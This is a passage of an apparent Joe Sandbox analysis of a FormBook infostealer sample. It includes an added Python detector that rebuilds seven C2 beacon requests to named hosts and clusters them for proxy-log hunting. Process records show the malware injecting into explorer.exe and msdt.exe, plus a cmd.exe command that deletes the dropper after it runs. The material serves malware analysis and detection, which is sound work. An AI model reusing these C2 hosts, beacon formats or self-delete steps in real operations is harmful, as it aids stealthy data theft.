2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 46b<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title><style type="text/css">::selection { background-color: #E13300; color: white; }::-moz-selection { background-color: #E13300; color: white; }body {background-color: #fff;margin: 40px;font: 13px/20px normal Helvetica, Arial, sans-serif;color: #4F5155;}a {color: #003399;background-color: transparent;font-weight: normal;}h1 {color: #444;background-color: transparent;border-bottom: 1px solid #D0D0D0;font-size: 19px;font-weight: normal;margin: 0 0 14px 0;padding: 14px 15px 10px 15px;}code {font-family: Consolas, Monaco, Courier New, Courier, monospace;font-size: 12px;background-color: #f9f9f9;border: 1px solid #D0D0D0;color: #002166;display: block;margin: 14px 0 14px 0;padding: 12px 10px 12px 10px;}#container {margin: 10px;border: 1px solid #D0D0D0;box-shadow: 0 0 8px #D0D0D0;}p {margin: 12px 15px 12px 15px;}</style></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>0
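The seven requests above share one shape: explorer.exe, not a browser, sends a GET to a single short directory (/eqas/) carrying one long base64-looking parameter and a second, constant token (4h3=vZRDNDdpalAdz8) that is identical across every host; Host and Connection: close are the only headers, there is no User-Agent, and seven NUL bytes follow the headers. The hosts rotate through the list, and most of them answer 403, 301 or 404 because they are decoys around the real C2. The detector below is an added example, not part of the Joe Sandbox report: it parses raw requests, scores those traits, and clusters requests by (path, parameter names, constant token) so that one process cycling through many hosts with the same beacon shape stands out. The seven beacon requests are constructed from the requests on this page; the two benign requests, their hosts (www.example.com, www.example.org) and the score and host-count thresholds are assumptions.

```python
import re
from collections import defaultdict

B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long base64-looking value
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{8,20}$")        # short constant token
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")            # single short directory


def _beacon(host: str, blob: str) -> bytes:
    # Constructed from the report: every request above is followed by
    # "Data Raw: 00 00 00 00 00 00 00", reproduced here as seven NUL bytes.
    return (f"GET /eqas/?Kzrx={blob}&4h3=vZRDNDdpalAdz8 HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\n\r\n").encode() + b"\x00" * 7


# (sending process, raw request) for the seven beacons in the "HTTP Packets" section.
FORMBOOK_SAMPLES = [
    ("C:\\Windows\\explorer.exe", _beacon("www.cjaccessories.net",
        "zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==")),
    ("C:\\Windows\\explorer.exe", _beacon("www.sportfest40.com",
        "5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==")),
    ("C:\\Windows\\explorer.exe", _beacon("www.kakavjesajt.com",
        "2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==")),
    ("C:\\Windows\\explorer.exe", _beacon("www.cursosdigitaisbr.com",
        "967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==")),
    ("C:\\Windows\\explorer.exe", _beacon("www.llmav.xyz",
        "ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==")),
    ("C:\\Windows\\explorer.exe", _beacon("www.35efb510815e.com",
        "+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==")),
    ("C:\\Windows\\explorer.exe", _beacon("www.beyoncos.com",
        "vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==")),
]

# Constructed benign traffic (hypothetical hosts) that the detector must not flag.
BENIGN_SAMPLES = [
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n"),
    ("C:\\Windows\\explorer.exe",
     b"GET /eqas/?q=search&page=2 HTTP/1.1\r\nHost: www.example.org\r\n"
     b"User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n"),
]


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into path, query parameters, headers and trailer."""
    head, _, trailer = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split the query by hand: urllib.parse.parse_qsl would turn '+' into a
    # space and corrupt the base64 blob the client sends.
    params = {}
    for item in (query.split("&") if query else []):
        key, _, value = item.partition("=")
        params[key] = value
    return {
        "method": method, "path": path, "params": params,
        "host": headers.get("host", ""), "headers": headers,
        # Count a trailer only when it is nothing but NUL bytes.
        "trailing_nul": len(trailer) if trailer and not trailer.strip(b"\x00") else 0,
    }


def beacon_features(process: str, req: dict) -> dict:
    """Traits shared by every request in the report, each as a boolean."""
    values = list(req["params"].values())
    blobs = [v for v in values if B64_BLOB.match(v) and len(v) % 4 == 0]
    tokens = [v for v in values if SHORT_TOKEN.match(v)]
    return {
        "short_dir_path": SHORT_DIR.match(req["path"]) is not None,
        "b64_blob_param": len(blobs) == 1,
        "constant_token_param": len(tokens) == 1,
        "no_user_agent": "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
        "nul_trailer": req["trailing_nul"] > 0,
        "shell_process": process.lower().endswith("\\explorer.exe"),
    }


def beacon_score(features: dict) -> int:
    return sum(features.values())


def find_beacon_clusters(samples, min_hosts: int = 3, min_score: int = 6) -> dict:
    """Group high-scoring requests by (path, parameter names, constant token) and
    keep groups spanning many distinct hosts: one client rotating through a
    C2/decoy list while sending the same encoded payload shape."""
    groups = defaultdict(set)
    for process, raw in samples:
        req = parse_http_request(raw)
        feats = beacon_features(process, req)
        if not (feats["b64_blob_param"] and feats["constant_token_param"]):
            continue
        if beacon_score(feats) < min_score:
            continue
        token = next(v for v in req["params"].values() if SHORT_TOKEN.match(v))
        key = (req["path"], tuple(sorted(req["params"])), token)
        groups[key].add(req["host"])
    return {k: sorted(h) for k, h in groups.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    for key, hosts in find_beacon_clusters(FORMBOOK_SAMPLES + BENIGN_SAMPLES).items():
        print(key, hosts)
```

The cluster key (the path and the constant token) is what you would pivot on in proxy logs; the score threshold keeps a single benign request to a short path from being flagged, and the host-count threshold keys on what the sandbox actually shows, one process cycling through a list of hosts. Process attribution only works where the log source records the sending process, so on a plain proxy log drop the shell_process trait and lower the threshold by one.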


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior


                                                                System Behavior

                                                                General

                                                                Start time:09:44:46
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x400000
                                                                File size:206697 bytes
                                                                MD5 hash:0CDBFDF044CFA1D810ED06B745AC9CD9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:09:44:47
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x400000
                                                                File size:206697 bytes
                                                                MD5 hash:0CDBFDF044CFA1D810ED06B745AC9CD9
                                                                Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 09:44:52
Start date: 12/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:45:07
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\msdt.exe
Imagebase: 0xff0000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 09:45:11
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:45:12
Start date: 12/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
